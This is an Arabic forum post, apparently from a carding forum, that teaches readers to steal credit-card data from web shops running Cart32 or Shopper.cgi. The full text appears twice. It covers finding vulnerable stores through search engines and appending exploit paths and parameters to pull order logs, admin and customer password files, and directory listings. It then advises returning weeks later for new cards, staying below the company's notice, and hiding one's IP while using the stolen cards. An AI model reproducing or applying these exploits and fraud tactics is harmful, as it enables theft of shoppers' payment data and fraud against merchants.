احمد سعد!
01-18-2006, 11:24 PM
--------------------------------------------------------------------------------
الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني ..
Cvv2 = CC with cvv code
Cvv = same with cvv2
cc = credit card
لدرس اليوم ينقسم الى :
اولا : عبر مواقع ذات نظام Cart32
ثانيا : عبر الـ Shopper.cgi
عبر مواقع ذات نظام Cart32 :
1.) ايجاد مواقع بأنظمة Cart32
2.) هل هذه المواقع مصابة ؟
3.) الثغرات .
4.) العودة مرة اخرى في المستقبل .
-----------------------------
اولا / ايجاد المواقع الشرائية :
-----------------------------
لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل www.google.com او
www.Av.com " المفضل لدي " و من ثم تقوم بالكتابة في مربع البحث عن :
Cart32.exe v3
و التي سوف تقوم بإحضار جميع مواقع الـ cart32.exe ذات الإصدار V*.3 و الذي يعد اكثر الإصدارات المصابة ..
عشان كذا اولا ما تلاقي اي موقع لـ cart32 على طول لا تسيبه يفوت منك ..
-----------------------------
ثانيا : هل الموقع مصاب بثغرة ؟
-----------------------------
و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها :
v2.5 مصاب 80 %
v3.0 مصاب 60 %
v3.5 مصاب 30 %
v4.0 غير مصاب " حتى الآن "
-----------------------------
ثالثا / The Exploits !
-----------------------------
هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن ..
فعندما نصل الى احد الـ Cart32 Site مثل :
http://www.example.com/cgi-bin/cart32.exe/whateve???r
كيف نحصل على الكروت الشرائية الموجودة داخله ؟
سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل :
http://www.example.com/cgi-bin/cart...ever-ORDERS.txt
http://www.example.com/cgi-bin/cart...teve-OUTPUT.txt
الحصول على باسورد الأدمن :
http://www.example.com/cgi-bin/cart32.ini
الحصول على باسورد العملاء :
http://www.example.com/cgi-bin/cart...art32clientlist
رؤية المجلدات داخل الموقع :
http://www.example.com/cgi-bin/cart32.exe/error
يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل"
-----------------------------
رابعا / العودة في المستقبل :
-----------------------------
عندك الحصول على الكروت الشرائية من المواقع ... و مازالت الشركة و الموقع يستقبل الطلبات ..
الحين تكون انت وقعت على كنز هههههههههههههه ليش ؟
لأنك تقدر ترجع بعد كم اسبوع و تاخد الفيز الجديدة مرة ثانية " يا حظك "
اول ما تاخد الفيز .. لا تحاول تاخد منها الكثير او تعطيها لأحد حتى لا تشك الشركة فيكم
................................... ............... ................................... ............
الطريقة الثانية و هي عبر اختراق الـ Shopper.cgi و يتكون من :
1.) ايجاد مواقع الـ Shopper.cgi .
2.) تجريب الإكسبلوتات عليها .
3.) العودة مرة أخرى للحصول على المزيد .
----------------
أولا / ايجاد الـ Shopper.CgI Site's :
----------------
مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل : www.Av.com
و تكتب في صندوق البحث SHOPPER.CGI و تبحث في المواقع حتى تجد مواقع يوجد في اسمه SHOPPER.CGI
مثال : www.example.com/xxxx/SHOPPER.CGI/xxxx
----------------
تجريب الإكسبلوتات :
----------------
لو كان عندك احد المواقع التي يوجد بها الـ shopper.cgi .. تروح تضيف بعدها الإكسبلوتات
" مثل المرة اللي فاتت "
و يوجد الكثير من الإكسبلوتات مثل :
&TEMPLATE=ORDER.LOG
التي تضاف في نهاية اسم الموقع .. و يمكنك البحث عن المزيد في جوجل ...
----------------
العودة مرة اخرى في المستقبل :
----------------
نفس اللي قلته قبل كذا ..
................................... ............... ........................
لا تنسى اخفائك للأي بي لحمايتك الشخصية اثناء استخدامك للفيزا ..
الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني ..
Cvv2 = CC with cvv code
Cvv = same with cvv2
cc = credit card
لدرس اليوم ينقسم الى :
اولا : عبر مواقع ذات نظام Cart32
ثانيا : عبر الـ Shopper.cgi
عبر مواقع ذات نظام Cart32 :
1.) ايجاد مواقع بأنظمة Cart32
2.) هل هذه المواقع مصابة ؟
3.) الثغرات .
4.) العودة مرة اخرى في المستقبل .
-----------------------------
اولا / ايجاد المواقع الشرائية :
-----------------------------
لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل www.google.com او
www.Av.com " المفضل لدي " و من ثم تقوم بالكتابة في مربع البحث عن :
Cart32.exe v3
و التي سوف تقوم بإحضار جميع مواقع الـ cart32.exe ذات الإصدار V*.3 و الذي يعد اكثر الإصدارات المصابة ..
عشان كذا اولا ما تلاقي اي موقع لـ cart32 على طول لا تسيبه يفوت منك ..
-----------------------------
ثانيا : هل الموقع مصاب بثغرة ؟
-----------------------------
و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها :
v2.5 مصاب 80 %
v3.0 مصاب 60 %
v3.5 مصاب 30 %
v4.0 غير مصاب " حتى الآن "
-----------------------------
ثالثا / The Exploits !
-----------------------------
هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن ..
فعندما نصل الى احد الـ Cart32 Site مثل :
http://www.example.com/cgi-bin/cart32.exe/whateve???r
كيف نحصل على الكروت الشرائية الموجودة داخله ؟
سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل :
http://www.example.com/cgi-bin/cart...ever-ORDERS.txt
http://www.example.com/cgi-bin/cart...teve-OUTPUT.txt
الحصول على باسورد الأدمن :
http://www.example.com/cgi-bin/cart32.ini
الحصول على باسورد العملاء :
http://www.example.com/cgi-bin/cart...art32clientlist
رؤية المجلدات داخل الموقع :
http://www.example.com/cgi-bin/cart32.exe/error
يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل"
-----------------------------
رابعا / العودة في المستقبل :
-----------------------------
عندك الحصول على الكروت الشرائية من المواقع ... و مازالت الشركة و الموقع يستقبل الطلبات ..
الحين تكون انت وقعت على كنز هههههههههههههه ليش ؟
لأنك تقدر ترجع بعد كم اسبوع و تاخد الفيز الجديدة مرة ثانية " يا حظك "
اول ما تاخد الفيز .. لا تحاول تاخد منها الكثير او تعطيها لأحد حتى لا تشك الشركة فيكم
................................... ............... ................................... ............
الطريقة الثانية و هي عبر اختراق الـ Shopper.cgi و يتكون من :
1.) ايجاد مواقع الـ Shopper.cgi .
2.) تجريب الإكسبلوتات عليها .
3.) العودة مرة أخرى للحصول على المزيد .
----------------
أولا / ايجاد الـ Shopper.CgI Site's :
----------------
مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل : www.Av.com
و تكتب في صندوق البحث SHOPPER.CGI و تبحث في المواقع حتى تجد مواقع يوجد في اسمه SHOPPER.CGI
مثال : www.example.com/xxxx/SHOPPER.CGI/xxxx
----------------
تجريب الإكسبلوتات :
----------------
لو كان عندك احد المواقع التي يوجد بها الـ shopper.cgi .. تروح تضيف بعدها الإكسبلوتات
" مثل المرة اللي فاتت "
و يوجد الكثير من الإكسبلوتات مثل :
&TEMPLATE=ORDER.LOG
التي تضاف في نهاية اسم الموقع .. و يمكنك البحث عن المزيد في جوجل ...
----------------
العودة مرة اخرى في المستقبل :
----------------
نفس اللي قلته قبل كذا ..
................................... ............... ........................
لا تنسى اخفائك للأي بي لحمايتك الشخصية اثناء استخدامك للفيزا ..